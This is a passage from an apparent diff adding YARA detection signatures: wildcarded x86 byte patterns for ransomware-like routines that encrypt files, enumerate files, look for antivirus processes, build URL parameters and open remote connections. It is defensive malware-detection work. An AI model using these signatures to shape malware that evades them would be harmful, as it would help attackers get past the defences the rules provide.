+ ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? FF D3 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? + 89 45 ?? FF D3 33 C9 8B D8 89 4D ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 75 ?? 56 FF + 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 3D + ?? ?? ?? ?? BA ?? ?? ?? ?? 0F 42 CA 01 87 ?? ?? ?? ?? 8B 55 ?? 83 97 ?? ?? ?? ?? ?? + 8B 7D ?? 89 4D ?? 8D 8D ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B C7 F7 D8 99 6A + ?? 6A ?? 52 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 + 57 53 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 + 53 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 8B 7D ?? 85 C9 0F 84 ?? ?? ?? ?? 6A ?? + 8D 45 ?? 50 68 ?? ?? ?? ?? 57 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? 89 + 45 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? + ?? 8B 5D ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 5D C3 + } + $crypt_files_v3 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 + ?? ?? ?? ?? ?? 50 6A ?? 8B D9 8B CA 6A ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 68 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 8B F8 C7 45 ?? ?? ?? ?? ?? 53 57 89 7D ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 57 FF 15 ?? ?? + ?? ?? 66 0F 6F 05 ?? ?? ?? ?? BA ?? ?? ?? ?? F3 0F 7F 85 ?? ?? ?? ?? 51 66 0F 6F 05 + ?? ?? ?? ?? 8D 4D ?? F3 0F 7F 45 ?? C6 45 ?? ?? 66 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 + ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 F3 0F 6F 85 ?? ?? ?? ?? 8B F8 6A ?? 68 ?? ?? + ?? ?? 68 ?? ?? ?? ?? F3 0F 7F 07 6A ?? F3 0F 6F 45 ?? 89 7D ?? F3 0F 7F 47 ?? FF D6 + F3 0F 6F 45 ?? 68 ?? ?? ?? ?? 89 45 ?? F3 0F 7F 00 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 + 57 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? + 85 C0 75 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? EB ?? 68 ?? + ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? + FF 15 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 8B 75 ?? 8B 5D ?? E9 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? + 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? + ?? 6A ?? FF 75 ?? FF D7 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 0F 57 C0 66 0F 13 45 ?? + 8B 75 ?? 8B 5D ?? E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF D6 6A ?? 8B D8 + 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? C7 03 ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? FF D6 8B + 3D ?? ?? ?? ?? 33 F6 33 C9 89 45 ?? 89 4D ?? EB ?? 8B 45 ?? 6A ?? 8D 4D ?? 51 68 ?? + ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 + ?? ?? ?? ?? 3D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? + 0F 42 F1 01 03 83 53 ?? ?? 8B 45 ?? 89 45 ?? 89 45 ?? A8 ?? 74 ?? 8B FF 40 A8 ?? 75 + ?? 89 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? FF 75 ?? 89 45 ?? FF 75 + ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 89 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 + ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 8B 4D ?? 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8D 45 + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 8B 4D ?? 8B 45 ?? + F7 D9 6A ?? 83 D0 ?? 6A ?? F7 D8 50 51 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 + ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 + ?? BE ?? ?? ?? ?? 89 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 85 F6 0F 84 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 8B 4D ?? 8B 75 ?? 85 C9 75 ?? 51 8D 45 ?? 50 + 68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 75 + ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? 53 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? + ?? ?? ?? 8B 03 8B 73 ?? 68 ?? ?? ?? ?? 6A ?? 53 89 45 ?? FF D7 68 ?? ?? ?? ?? 6A ?? + FF 75 ?? FF D7 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 8B 5D ?? 68 ?? ?? ?? ?? 6A ?? FF + 75 ?? FF D7 5F 8B D6 8B C3 5E 5B 8B E5 5D C3 + } + $search_antivirus_processes_v5 = { + 8B 7D ?? 6A ?? 53 6A ?? 33 DB 89 07 53 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF + D6 8B F0 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 6A ?? C7 06 ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? EB ?? 56 33 C9 89 + 5D ?? 50 89 5D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F + 85 ?? ?? ?? ?? 33 C0 8D 4E ?? 89 45 ?? 51 FF 74 85 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? + 8B 45 ?? 8D 4E ?? 40 89 45 ?? 83 F8 ?? 72 ?? EB ?? 33 C0 39 45 ?? 8D 58 ?? 8D 46 ?? + 50 FF 37 75 ?? FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 37 FF 15 + ?? ?? ?? ?? FF 45 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 8D 0C 41 8B 45 ?? + 81 F9 ?? ?? ?? ?? 89 4D ?? 59 0F 47 C1 89 45 ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 + 74 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 85 DB 74 ?? 8B 07 33 C9 66 39 08 + 74 ?? 50 FF 15 ?? ?? ?? ?? 8B 0F 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D ?? 89 08 68 ?? + ?? ?? ?? 33 C0 50 56 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? 85 DB 75 ?? + 68 ?? ?? ?? ?? 33 C0 50 FF 37 FF D6 8B C3 5F 5E 5B 8B E5 5D C2 + } + $find_files_v5 = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39 + 7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9 + ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ?? + 89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 57 57 8D 44 24 ?? 50 + 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 ?? BF + ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 + ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF + 15 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? + 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? + ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE + E8 ?? ?? ?? ?? 59 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? + ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? + ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3 + } + $crypt_files_v5 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B D9 89 55 ?? 33 FF 89 5D ?? 21 7D ?? B9 ?? ?? + ?? ?? 89 7D ?? E8 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? FF 75 + ?? 8D 55 ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? EB ?? + 33 C0 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB + ?? 75 ?? 33 C0 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? + ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? FF 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 + ?? ?? ?? ?? 6A ?? 58 C6 45 ?? ?? 48 75 ?? 51 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ?? ?? ?? 21 7D ?? 21 7D ?? 41 89 45 ?? + 8B 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 8E ?? ?? ?? ?? 83 C1 ?? 89 45 ?? E8 ?? ?? ?? ?? + 89 45 ?? 33 FF 6A ?? 8D 45 ?? 50 FF B6 ?? ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 + C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 3B 86 ?? ?? ?? ?? 8B 55 ?? 6A + ?? 59 0F 42 F9 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 0F 45 7D ?? 01 86 ?? ?? ?? ?? 89 7D ?? + 83 96 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 + C9 F7 D8 41 99 51 6A ?? 52 50 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 + ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? + 8D 45 ?? 50 57 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 75 ?? 8B 7D ?? 33 C0 40 01 86 + ?? ?? ?? ?? 83 96 ?? ?? ?? ?? ?? EB ?? 33 C0 8D 78 ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D + ?? ?? 74 ?? 6A ?? 6A ?? 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? + ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? + E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? + 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? 83 65 ?? ?? 83 65 ?? ?? 8B 35 ?? + ?? ?? ?? FF D6 8D 0C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F8 33 C0 40 83 67 ?? + ?? 88 07 FF D6 FF 75 ?? 03 C0 89 47 ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 FF 75 ?? 8D 47 + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 75 ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 57 8D 45 + ?? 50 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01 8B CF E8 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? FF + 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B + 8B E5 5D C3 + } + $remote_connection_v5 = { + 55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3 + 8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ?? + ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? + 83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68 + ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF + 75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 FF 47 EB ?? FF + 15 ?? ?? ?? ?? 8B 45 ?? 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B + E5 5D C2 + } + $remote_connection_v5_0_1 = { + 55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3 + 8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ?? + ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? + 83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68 + ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF + 75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 33 C9 41 85 C0 8B 45 ?? 0F 45 + F9 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C2 + } + $url_parameters_setup_v5 = { + 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? + 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? + 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 + ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? + 75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 + ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF + 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 + ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A + ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? + ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? + ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A + ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? + ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B E5 5D C3 + } + $url_parameters_setup_v5_0_1 = { + 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? + 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? + 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 + ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? + 75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 + ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF + 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 + ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A + ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? + ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? + ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A + ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? + ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B E5 5D C3 + } + $crypt_files_v5_0_1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B D9 89 55 ?? 33 FF 89 5D ?? 21 7D ?? B9 ?? ?? + ?? ?? 89 7D ?? E8 ?? ?? ?? ?? 8B F0 33 C0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 50 68 ?? + ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 75 ?? 33 C0 + 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB + ?? 0F 84 ?? ?? ?? ?? 8B 7D ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 6A + ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 50 68 + ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? + 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? + ?? 53 FF 15 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 6A ?? 6A ?? 0F 57 + C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? 83 65 ?? ?? 8D 55 + ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? 58 C6 45 ?? ?? 48 75 ?? 51 68 + ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ?? + ?? ?? 83 65 ?? ?? 83 65 ?? ?? 41 89 45 ?? 8B 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 8E ?? + ?? ?? ?? 83 C1 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 33 FF 6A ?? 8D 45 ?? 50 FF B6 ?? + ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 + ?? ?? ?? ?? 3B 86 ?? ?? ?? ?? 8B 55 ?? 6A ?? 59 0F 42 F9 83 7D ?? ?? 8D 8D ?? ?? ?? + ?? 0F 45 7D ?? 01 86 ?? ?? ?? ?? 89 7D ?? 83 96 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 75 ?? + 89 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 6A ?? 52 50 53 FF 15 ?? + ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 + ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 53 FF 15 ?? ?? ?? ?? 85 + C0 74 ?? 8B 75 ?? 8B 7D ?? 33 C0 40 01 86 ?? ?? ?? ?? 83 96 ?? ?? ?? ?? ?? EB ?? 33 + C0 8D 78 ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 0F 57 C0 66 0F 13 + 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53 + FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B + CE E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? + FF 75 ?? 83 65 ?? ?? 83 65 ?? ?? 8B 35 ?? ?? ?? ?? FF D6 8D 0C 45 ?? ?? ?? ?? E8 ?? + ?? ?? ?? FF 75 ?? 8B F8 33 C0 40 83 67 